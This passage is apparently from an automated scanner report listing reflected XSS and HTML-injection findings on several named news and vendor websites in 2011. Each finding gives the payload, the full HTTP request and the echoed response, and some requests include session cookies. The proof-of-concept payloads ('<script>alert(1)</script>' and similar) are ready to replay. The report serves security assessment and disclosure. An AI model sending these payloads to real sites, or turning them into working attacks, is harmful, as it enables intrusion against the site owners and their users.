X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
ETag: "d009d37e9d56f8f839cea714c7a26681"
X-Runtime: 47
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 159
Status: 200
Content-Type: text/javascript; charset=utf-8

JSONPCallback_097df2<script>alert(1)</script>c347156b75c({"blacklists":[],"xpaths":["//div[@class='content-text']"],"message":"new page re-instrumenting: ok"})
2.51. http://pglb.buzzfed.com/148250/91bc34b96eac101805574950b6644cc6 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /148250/91bc34b96eac101805574950b6644cc6

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cf6f5<script>alert(1)</script>7bb596485ce was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /148250/91bc34b96eac101805574950b6644cc6?callback=BF_PARTNER.gate_responsecf6f5<script>alert(1)</script>7bb596485ce&cb=1793 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604763
Expires: Mon, 19 Sep 2011 12:47:23 GMT
Date: Mon, 12 Sep 2011 12:48:00 GMT
Connection: close

BF_PARTNER.gate_responsecf6f5<script>alert(1)</script>7bb596485ce(1304470645);
2.52. http://player.ooyala.com/player.js [autoplay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The value of the autoplay request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5fc32%3balert(1)//3209774be4c was submitted in the autoplay parameter. This input was echoed as 5fc32;alert(1)//3209774be4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player.js?autoplay=05fc32%3balert(1)//3209774be4c&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr HTTP/1.1
Host: player.ooyala.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 12 Sep 2011 13:02:06 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-9d79a4f1
X-Pad: avoid browser bug
Content-Length: 26501
Cache-Control: private, max-age=300
Date: Mon, 12 Sep 2011 13:02:06 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
NJl90x_Sxol5VyMQcXiGLsb0g2h6vnF5i0-T5Ft4xBOt5dq6lB95jeM5d5eZMMassZqCrj2-1YzQoYyyPKpBOsL7oivj3RtKy7";var S=window.location.href;if(S){if(G&&(G[G.length-1]!="&")){G+="&";}G+="docUrl="+escape(S);}var O="05fc32;alert(1)//3209774be4c";if(document.location.host.toLowerCase().indexOf("beboframe.com")>
...[SNIP]...
2.53. http://savannahnow.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4324a'-alert(1)-'2befc103ff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?4324a'-alert(1)-'2befc103ff4=1 HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 12:49:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 12:54:27 GMT
Last-Modified: Mon, 12 Sep 2011 12:49:26 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315831766"-gzip
Vary: Accept-Encoding
Content-Length: 149917
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
// MDW_Group
           s.prop17='Home' // MDW_Cat
           s.prop18='97010 Home' // MDW_Sub_Cat
           s.prop19=''
           s.prop20=''
s.prop21 = '' //NID
s.prop22 = '' //Author
s.prop23 = '?4324a'-alert(1)-'2befc103ff4=1' //Tax
s.prop24 = '' //Content type
s.campaign=s.getQueryParam('cid');

           /********* INSERT THE DOMAIN AND PATH TO YOUR CODE BELOW ************/

           var s_code=s.t();if(s_code)document.
...[SNIP]...
2.54. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /sites/all/modules/morris/yca_plugin/yahoo.cssca685

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ae60'-alert(1)-'04761a867b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites6ae60'-alert(1)-'04761a867b7/all/modules/morris/yca_plugin/yahoo.cssca685 HTTP/1.1
Host: savannahnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cm.npc-morris.overture.com/js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685%22%3E%3Cscript%3Ealert(1)%3C/script%3E7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547

Response

HTTP/1.0 404 Not Found
Date: Mon, 12 Sep 2011 13:00:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:05:48 GMT
Last-Modified: Mon, 12 Sep 2011 13:00:48 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315832448"-gzip
Vary: Accept-Encoding
Content-Length: 79238
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
up
           s.prop17='97040 Other' // MDW_Cat
           s.prop18='97040 Other' // MDW_Sub_Cat
           s.prop19=''
           s.prop20=''
s.prop21 = '' //NID
s.prop22 = '' //Author
s.prop23 = 'Sites6ae60'-alert(1)-'04761a867b7' //Tax
s.prop24 = '' //Content type
s.campaign=s.getQueryParam('cid');

           /********* INSERT THE DOMAIN AND PATH TO YOUR CODE BELOW ************/

           var s_code=s.t();if(s_code)document.wr
...[SNIP]...
2.55. http://video.fastcompany.com/companies/mansueto-digital/videos.rss [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.fastcompany.com
Path:   /companies/mansueto-digital/videos.rss

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 28b0a<script>alert(1)</script>3cd7c3816cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /companies28b0a<script>alert(1)</script>3cd7c3816cf/mansueto-digital/videos.rss?ids=35a3467f31b51,5a74966232a47,1bc51eb069eb1,29b58b01bf488,79b00a7ba65dd,273bd40607339&append_image_to_description=false&verbosity=low&p=fc_playlist_homepage&template_ids=rtmp_only%2Cflowplayer%2Cflowplayer_bwcheck&assets=dynamic_stream_switching_capable&append_image_to_description=false&still_frame_height=180 HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1603584230-1315849705375

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:49:11 GMT
Server: VoxCAST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Status: 404
X-Runtime: 15
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
Content-Length: 610
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<body>
<h1>File "/companies28b0a<script>alert(1)</script>3cd7c3816cf/mansueto-digital/videos.rss?ids=35a3467f31b51,5a74966232a47,1bc51eb069eb1,29b58b01bf488,79b00a7ba65dd,273bd40607339&append_image_to_description=false&verbosity=low&p=fc_playlist_homepage&template_ids=
...[SNIP]...
2.56. http://www.ciphertex.com/misc/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /misc/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27b58"><a>9130c261090 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /misc27b58"><a>9130c261090/favicon.ico HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:04 GMT
Vary: Accept-Encoding
Content-Length: 9999
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-misc27b58"><a>9130c261090-favicon.ico" class="section-misc27b58">
...[SNIP]...
2.57. http://www.ciphertex.com/modules/system/defaults.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99907"><a>10a7c8eef9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /99907"><a>10a7c8eef9e/system/defaults.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:35 GMT
Vary: Accept-Encoding
Content-Length: 10005
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-99907"><a>10a7c8eef9e-system-defaults.css" class="section-99907">
...[SNIP]...
2.58. http://www.ciphertex.com/modules/system/maintenance.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/maintenance.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e7f"><a>be9fe9bf51d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /58e7f"><a>be9fe9bf51d/system/maintenance.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:26 GMT
Vary: Accept-Encoding
Content-Length: 10011
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-58e7f"><a>be9fe9bf51d-system-maintenance.css" class="section-58e7f">
...[SNIP]...
2.59. http://www.ciphertex.com/modules/system/system-menus.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d310"><a>4a350385199 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /9d310"><a>4a350385199/system/system-menus.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:32 GMT
Vary: Accept-Encoding
Content-Length: 10013
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-9d310"><a>4a350385199-system-system-menus.css" class="section-9d310">
...[SNIP]...
2.60. http://www.ciphertex.com/modules/system/system-menus.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78804"><a>580dc18678 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /modules/system78804"><a>580dc18678/system-menus.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:03 GMT
Vary: Accept-Encoding
Content-Length: 10011
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-modules-system78804"><a>580dc18678-system-menus.css" class="section-modules sidebar-none">
...[SNIP]...
2.61. http://www.ciphertex.com/modules/system/system.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8557"><a>87f9da9af62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /modules/system/system.cssc8557"><a>87f9da9af62?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:24 GMT
Vary: Accept-Encoding
Content-Length: 10001
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-modules-system-system.cssc8557"><a>87f9da9af62" class="section-modules sidebar-none">
...[SNIP]...
2.62. http://www.ciphertex.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b77bd"><a>f6aa1bd3806 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/cck/modules/b77bd"><a>f6aa1bd3806/fieldgroup.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:32 GMT
Vary: Accept-Encoding
Content-Length: 10039
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-cck-modules-b77bd"><a>f6aa1bd3806-fieldgroup.css" class="section-sites sidebar-none">
...[SNIP]...
2.63. http://www.ciphertex.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77d66"><a>596ac13dd54 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/cck/modules/fieldgroup/77d66"><a>596ac13dd54?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:40 GMT
Vary: Accept-Encoding
Content-Length: 10031
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
